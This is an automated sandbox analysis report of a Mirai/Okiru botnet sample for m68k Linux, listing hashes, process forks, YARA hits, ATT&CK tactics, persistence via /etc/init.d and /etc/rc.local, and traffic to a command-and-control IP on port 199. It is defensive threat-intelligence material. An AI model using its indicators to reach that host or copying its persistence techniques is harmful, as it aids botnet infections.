Linux
Analysis Report
m68k.nn.elf
Overview
General Information
Sample name: | m68k.nn.elf |
Analysis ID: | 1561686 |
MD5: | 121b75151974de520fd8169c5035e9dc |
SHA1: | d84f78664394bba19fb1c7bff7bee06edd2c7de8 |
SHA256: | e4483ccfcae1edd9f9b0ffb401f3ab5be6fa0cb0dcd17831ded285966604e6eb |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1561686 |
Start date and time: | 2024-11-24 05:02:07 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 27s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | m68k.nn.elf |
Detection: | MAL |
Classification: | mal80.spre.troj.evad.linELF@0/10@2/0 |
- VT rate limit hit for: /etc/init.d/system
Command: | /tmp/m68k.nn.elf |
PID: | 5426 |
Exit Code: | 139 |
Exit Code Info: | SIGSEGV (11) Segmentation fault invalid memory reference |
Killed: | False |
Standard Output: | |
Standard Error: | qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
- system is lnxubuntu20
- m68k.nn.elf New Fork (PID: 5442, Parent: 5426)
- m68k.nn.elf New Fork (PID: 5463, Parent: 5426)
- sh New Fork (PID: 5472, Parent: 5463)
- m68k.nn.elf New Fork (PID: 5495, Parent: 5426)
- sh New Fork (PID: 5501, Parent: 5495)
- m68k.nn.elf New Fork (PID: 5502, Parent: 5426)
- sh New Fork (PID: 5506, Parent: 5502)
- m68k.nn.elf New Fork (PID: 5507, Parent: 5426)
- m68k.nn.elf New Fork (PID: 5509, Parent: 5426)
- sh New Fork (PID: 5531, Parent: 5509)
- m68k.nn.elf New Fork (PID: 5532, Parent: 5426)
- sh New Fork (PID: 5537, Parent: 5532)
- m68k.nn.elf New Fork (PID: 5538, Parent: 5426)
- sh New Fork (PID: 5543, Parent: 5538)
- m68k.nn.elf New Fork (PID: 5544, Parent: 5426)
- udisksd New Fork (PID: 5436, Parent: 802)
- udisksd New Fork (PID: 5474, Parent: 802)
- gnome-session-binary New Fork (PID: 5475, Parent: 1588)
- systemd New Fork (PID: 5480, Parent: 5478)
- gdm3 New Fork (PID: 5510, Parent: 1400)
- gdm3 New Fork (PID: 5530, Parent: 1400)
- udisksd New Fork (PID: 5552, Parent: 802)
- udisksd New Fork (PID: 5607, Parent: 802)
- udisksd New Fork (PID: 5608, Parent: 802)
- systemd New Fork (PID: 5634, Parent: 1)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
Click to see the 1 entries |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Mkdir executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file | ||
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file | ||
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File: | Jump to dropped file | ||
Source: | File: | Jump to dropped file |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | 1 Data Manipulation |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 2 File and Directory Permissions Modification | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 2 Scripting | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Linux.Backdoor.Mirai |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
daisy.ubuntu.com | 162.213.35.25 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
154.216.19.139 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
154.216.19.139 | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
daisy.ubuntu.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | Get hash | malicious | Mirai, Okiru | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | XenoRAT | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | XenoRAT | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
/etc/init.d/m68k.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
/etc/init.d/system | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
/etc/rc.local | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 118 |
Entropy (8bit): | 4.648756146188875 |
Encrypted: | false |
SSDEEP: | 3:KPJRXSC/ANFDDoC6WgrbkILbaaFOdFXa5O:WJRlufonWgrZbaaeXCO |
MD5: | D92F5E8E17BDB4502DE149B09746D400 |
SHA1: | D56B28286B13518769A4B27555F875EE4B36DB56 |
SHA-256: | 5C90BE50A0DDA68C384B3B56B21DB30C1F0CCF9E00A13D90421EA0E436A7E61F |
SHA-512: | 5F1ED84FB5089CD017B0907A55C97F12951EE500E8C8A1A357027701C2EC4EE26430DF4A623068D7D04BD6802C12F8E4F58281736C38986398DBA8325BE4884B |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /bin/sh |
File Type: | |
Category: | dropped |
Size (bytes): | 398 |
Entropy (8bit): | 4.586399031280707 |
Encrypted: | false |
SSDEEP: | 12:QRkiMEXNxl8RUJgjvMHK2FSuKN+dRRucSOyd3:vRWISzhYOM3 |
MD5: | 14CB06C643C4DCA73B64B23284CF2763 |
SHA1: | 96993D1DCEA6A6F005F554569CD1C8AAFB08FBBB |
SHA-256: | 3AADC3766DB7E7F284DE0497F08BD2B1772B123C537BA087DD7DA7C37919E023 |
SHA-512: | 63ABD56C1C266B0EB8D98C3FD47FB88FD09A37DFDD67C4A59EC679C43BAF987D961D3B60FF338F0D069B89DC2600628AC0814D7890F891B62487AB6CD0072E89 |
Malicious: | true |
Joe Sandbox View: | |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 105 |
Entropy (8bit): | 4.649400035181374 |
Encrypted: | false |
SSDEEP: | 3:TKH4vZKSC/ANFDvSDRFXWgrbkILpaKB0dFLoKE0:h8luzSXXWgrZzBeLXE0 |
MD5: | E6A67B96787FC1B6EDA521646D9920CD |
SHA1: | E59A352E76F3C709F37C670AE2E4EEAF337CB5A9 |
SHA-256: | 5D4E84611ADE58BDFABC1E3D137026054CB5744D1BD224BFBAF1B10E46E8404C |
SHA-512: | D388E666B0D683949626DBBA7E050F1D8125BE5C57419F6F53DECA19CB1B64DCB94E3097C96C430B28E9FEB71F3C5D4264264C667EC2961479F2B3C4C116447A |
Malicious: | true |
Joe Sandbox View: | |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 110 |
Entropy (8bit): | 4.601231599772524 |
Encrypted: | false |
SSDEEP: | 3:nAWu58C/ANFDDoC6WgrbkILbaaFOdFXa5O:ANufonWgrZbaaeXCO |
MD5: | CFCDBD3AA5CBD4171FCD40080EB52E47 |
SHA1: | 406C8A608D611B3F6BBBE624935CFE4A5186347B |
SHA-256: | C06E2679C4765D701B03A76E0010DBA34BC6A2A7E30E6402B8BA6FFFCED6C4DB |
SHA-512: | 80BE4C753C7DCE271CD755AC931582BAC2C4DAA4EC57AC598A9E647743BD514B17F2A239629A2BA89A2BF46F10ED7E88D58212B504ABAAB42340E3D7DC73F43D |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 53 |
Entropy (8bit): | 3.871459242626451 |
Encrypted: | false |
SSDEEP: | 3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e |
MD5: | 2BD9B4BE30579E633FC0191AA93DF486 |
SHA1: | 7D63A9BD9662E86666B27C1B50DB8E7370C624FF |
SHA-256: | 64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D |
SHA-512: | AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5 |
Malicious: | false |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 101 |
Entropy (8bit): | 4.488319695814355 |
Encrypted: | false |
SSDEEP: | 3:TgSC/ANFDvSDRFXWgrbkILbaaFOdFXa50:TgluzSXXWgrZbaaeXC0 |
MD5: | F20A89BA494D443C4631AF3C5DCAAE36 |
SHA1: | 9DF4F458CF5AB8D30516106C240EA2776946DDBA |
SHA-256: | F5BFC66DC714E549923EDE002A8BB3358537F264A1080B4827742E6582FBACDA |
SHA-512: | D83F142FF3C3EB9C8938719364A0F09D15BAFAFD1EDE2D4B0CD92FC093DB8F9A7FC03DFA1643C731D3444A4B5D0E153C6B0521AE7C55A83A01EE6B88621286A8 |
Malicious: | true |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 10 |
Entropy (8bit): | 3.121928094887362 |
Encrypted: | false |
SSDEEP: | 3:TKH4vn:hv |
MD5: | 3E2B31C72181B87149FF995E7202C0E3 |
SHA1: | BD971BEC88149956458A10FC9C5ECB3EB99DD452 |
SHA-256: | A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF |
SHA-512: | 543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 299 |
Entropy (8bit): | 5.065814119373622 |
Encrypted: | false |
SSDEEP: | 6:z8ifitRZAMzdK+xE02+GWRdCWgrL+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRdk+GWRXY+GWRuL6 |
MD5: | BF3F0CC70BF8D3E32BBFBE3CEDC43163 |
SHA1: | CB741181853423039BE639E8900AFAD415D517CD |
SHA-256: | EA1D8F5173116929B42FEAFD9E4B3B101BB39BCDAF3F27FD36F6AE1EF00D1D4C |
SHA-512: | 7D82E155B2AB39303D56A07479EE85766C0A9A40A93DCA33674E51590DEF92088C84EA39E82E13551719E6FFE40867715AF36B907735A9CDDAEE17A71B26A77D |
Malicious: | false |
Preview: |
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 17 |
Entropy (8bit): | 3.6168746059562227 |
Encrypted: | false |
SSDEEP: | 3:TgSC/ANln:TglOn |
MD5: | CF5BFD6A623ECC046218AA0EBA4D8FE7 |
SHA1: | E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88 |
SHA-256: | C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560 |
SHA-512: | F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.426889750636427 |
TrID: |
|
File name: | m68k.nn.elf |
File size: | 116'824 bytes |
MD5: | 121b75151974de520fd8169c5035e9dc |
SHA1: | d84f78664394bba19fb1c7bff7bee06edd2c7de8 |
SHA256: | e4483ccfcae1edd9f9b0ffb401f3ab5be6fa0cb0dcd17831ded285966604e6eb |
SHA512: | 45f0835f2872aa6e3143dc467405c7af606b670f8a8df8cd224392456b7cec920718e91e7fed21e9246f4d86cbbe28449f7461867d12bdbd5fb54df93a1fe151 |
SSDEEP: | 3072:2mLjMtcNiDvv8C7smjW1Ki1dF09yTmv4P8+Hkkjg8D:FMtUTCyTim82kmlD |
TLSH: | 1CB33AC6F800CABDF91ED67B54270B19B57063615F520F27A25BFEA3ADB11E4081BE81 |
File Content Preview: | .ELF.......................D...4.........4. ...(.................................. .......................($...... .dt.Q............................NV..a....da....$N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 116424 |
Section Header Size: | 40 |
Number of Section Headers: | 10 |
Header String Table Index: | 9 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80000094 | 0x94 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.text | PROGBITS | 0x800000a8 | 0xa8 | 0x18f4e | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.fini | PROGBITS | 0x80018ff6 | 0x18ff6 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.rodata | PROGBITS | 0x80019004 | 0x19004 | 0x30b8 | 0x0 | 0x2 | A | 0 | 0 | 2 |
.ctors | PROGBITS | 0x8001e0c0 | 0x1c0c0 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x8001e0c8 | 0x1c0c8 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x8001e0d4 | 0x1c0d4 | 0x5b4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x8001e688 | 0x1c688 | 0x225c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.shstrtab | STRTAB | 0x0 | 0x1c688 | 0x3e | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x80000000 | 0x80000000 | 0x1c0bc | 0x1c0bc | 6.4385 | 0x5 | R E | 0x2000 | .init .text .fini .rodata | |
LOAD | 0x1c0c0 | 0x8001e0c0 | 0x8001e0c0 | 0x5c8 | 0x2824 | 5.0448 | 0x6 | RW | 0x2000 | .ctors .dtors .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 24, 2024 05:02:55.233901978 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.355465889 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.355529070 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.359510899 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.361591101 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.368453026 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.479060888 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.487917900 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.487968922 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.489228964 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.489887953 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.493213892 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.525002956 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.608686924 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.612670898 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.612730980 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.614250898 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.615084887 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.630811930 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.653012037 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.733676910 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.750389099 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.750442028 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.754146099 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.756309986 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.763883114 CET | 40294 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.781022072 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.874166965 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.884033918 CET | 199 | 40294 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:55.884089947 CET | 40294 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.887629986 CET | 40294 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.889836073 CET | 40294 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.893531084 CET | 40296 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:55.917021990 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.007148027 CET | 199 | 40294 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.013044119 CET | 199 | 40296 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.013185978 CET | 40296 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.053011894 CET | 199 | 40294 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.102592945 CET | 40296 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.104814053 CET | 40296 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.144887924 CET | 40298 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.222048998 CET | 199 | 40296 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.264381886 CET | 199 | 40298 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.264967918 CET | 199 | 40296 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.266839981 CET | 40298 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.271090984 CET | 40298 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.273147106 CET | 40298 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.279613018 CET | 40300 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.390571117 CET | 199 | 40298 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.399179935 CET | 199 | 40300 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.399247885 CET | 40300 | 199 | 192.168.2.13 | 154.216.19.139 |
